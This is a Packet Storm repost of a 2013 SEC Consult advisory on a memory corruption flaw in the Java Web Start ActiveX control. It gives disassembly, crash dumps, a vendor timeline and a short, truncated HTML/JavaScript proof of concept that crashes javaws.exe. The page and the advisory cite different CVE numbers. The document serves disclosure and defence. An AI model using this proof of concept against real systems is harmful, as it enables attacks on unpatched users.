exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Java Web Start Launcher Memory Corruption

Java Web Start Launcher Memory Corruption
Posted Apr 17, 2013
Authored by A. Antukh | Site sec-consult.com

The Java active-x control in Java Web Start Launcher suffers from a memory corruption vulnerability.

tags | exploit, java, web, activex
advisories | CVE-2013-2416
SHA-256 | bda67853310f31100eb0d7eabe5f41ccba0af48ed6d9d0588dbc627b879ca5c2

Java Web Start Launcher Memory Corruption

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20130417-1 >
title: Java ActiveX Control Memory Corruption
product: Java(TM) Web Start Launcher
vulnerable version: Sun Java Version 7 Update 17 and before
Sun Java Version 6 Update 43 and before
Sun Java Version 5.0 Update 41 and before
fixed version: Patch information see sections below
CVE: CVE-2013-2419
impact: medium
homepage: http://www.java.com/
found: 2012-11-13
by: A. Antukh
SEC Consult Vulnerability Lab

Vendor description:
"To date, the Java platform has attracted more than 9 million software
developers. It's used in every major industry segment and has a presence
in a wide range of devices, computers, and networks.

Java technology's versatility, efficiency, platform portability, and
security make it the ideal technology for network computing. From laptops
to datacenters, game consoles to scientific supercomputers, cell phones to
the Internet, Java is everywhere!"

Source: http://www.java.com/en/about/

Vulnerability overview/description:
Memory corruption vulnerability exists in the launchApp() method of the
deployJava1.dll which is loaded by Internet Explorer and used to launch
javaws.exe with provided arguments. The second (optional) parameter that
is responsible for embedded data is checked improperly, which causes memory
corruption and reading from arbitrary address if specific conditions are met.

Successful exploitation of this vulnerability could potentially result in
an arbitrary code execution within the Java(TM) Web Start Launcher or cause
the application to crash.

Vulnerability details:
The launchApp() method expects the following arguments: *pJNLP, *pEmbedded
(optional) and *pVmArgs (optional). Providing a single wrong *pJNLP argument
causes an application to prompt an error message and exit. However, if an
attacker provides the second argument, it will be checked before quitting.

The function responsible for processing an auto-generated temp file containing
input args is the following:

.text:0040560F push eax ; size of input data
.text:00405610 push esi ; malcrafted string
.text:00405611 call tmp_processing

If the input length doesn't satisfy condition of bitwise AND, the function
returns zero and exits:

.text:0040950B mov edx, [ebp+arg_4]
.text:0040950E test dl, 3 ; if size satisfies condition
.text:00409511 jz short loc_409517 ; jump to processing
.text:00409513 xor eax, eax ; otherwise return 0 and exit
.text:00409515 leave
.text:00409516 retn

The returned data is used later to write from, causing an access violation:

.text:00405611 call tmp_processing
.text:00405616 mov esi, eax
(cc0.9fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00155a10 ebx=00000000 ecx=00000008 edx=ffd21610 esi=00000000 edi=00000001
eip=00402a0d esp=0012e6a8 ebp=0012e734 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
00402a0d 8b86cc000000 mov eax,dword ptr [esi+0CCh] ds:0023:000000cc=????????

However, if the size fits the condition of bitwise AND, the program flow
continues. The memory of input string length size is allocated:

.text:00409547 push eax ; size_t
.text:00409548 mov [ebp+var_4], ecx
.text:0040954B call _malloc

First WORD of the malformed string is taken and compared to 3Dh (equal sign '=')
to ignore it. If the WORD is not equal to 3Dh, data from the calculated offset from
input string is read.

.text:00409571 cmp ecx, 3Dh
.text:00409574 jnz short crash_place
.text:00409576 xor ecx, ecx
.text:00409578 jmp short loc_409582
.text:0040957A ; ---------------------------------------------------------------------------
.text:0040957A crash_place: ; CODE XREF: tmp_processing+97j
.text:0040957A movzx ecx, word_445670[ecx*2]

If the resulting offset points to unallocated memory, an access violation
exception is thrown:

eax=001542a0 ebx=001559f8 ecx=0000aaee edx=00000000 esi=00000000 edi=001558c8
eip=0040957a esp=0012e650 ebp=0012e668 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
0040957a 0fb70c4d70564400 movzx ecx,word ptr javaws+0x45670 (00445670)[ecx*2] ds:0023:0045ac4c=????

When carefully calculated, this could potentially lead to arbitrary code

The following PoC code can be used to test this vulnerability. It will crash the
javaws.exe process when opened in Internet Explorer.

<TITLE>Java ActiveX component memory corruption</TITLE>
<OBJECT id='javaws' classid='clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA'></object>
function Exploit(){
var dword=unescape("%uAAAA%uBBBB");
for( mem = ""; mem.length<0x2F; mem +=dword );

Vulnerable / tested versions:
The vulnerability has been verified to exist in Java(TM) Platform SE 7 U9,
which was the most recent version at the time of discovery.

Vendor contact timeline:
2012-11-16: Contacted vendor through secalert_us@oracle.com
2012-11-17: Initial vendor response - issues will be verified
2012-11-30: Vulnerability is confirmed and reproduced by the vendor
2013-02-25: Under investigation / Being fixed in main codeline
2013-03-26: Issue fixed in main codeline, scheduled for a future CPU
2013-04-13: Oracle: Advisory and patches will be released on 2013-04-16
2013-04-16: Oracle releases April 2013 CPU
2013-04-17: Public release of SEC Consult advisory

Apply latest patches, see:

No workaround is available.

Advisory URL:

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com

EOF A. Antukh / @2013

Login or Register to add favorites

File Archive:

May 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    16 Files
  • 3
    May 3rd
    38 Files
  • 4
    May 4th
    15 Files
  • 5
    May 5th
    35 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    8 Files
  • 9
    May 9th
    65 Files
  • 10
    May 10th
    19 Files
  • 11
    May 11th
    27 Files
  • 12
    May 12th
    8 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    1 Files
  • 15
    May 15th
    19 Files
  • 16
    May 16th
    66 Files
  • 17
    May 17th
    28 Files
  • 18
    May 18th
    32 Files
  • 19
    May 19th
    13 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    23 Files
  • 23
    May 23rd
    15 Files
  • 24
    May 24th
    49 Files
  • 25
    May 25th
    20 Files
  • 26
    May 26th
    13 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    11 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By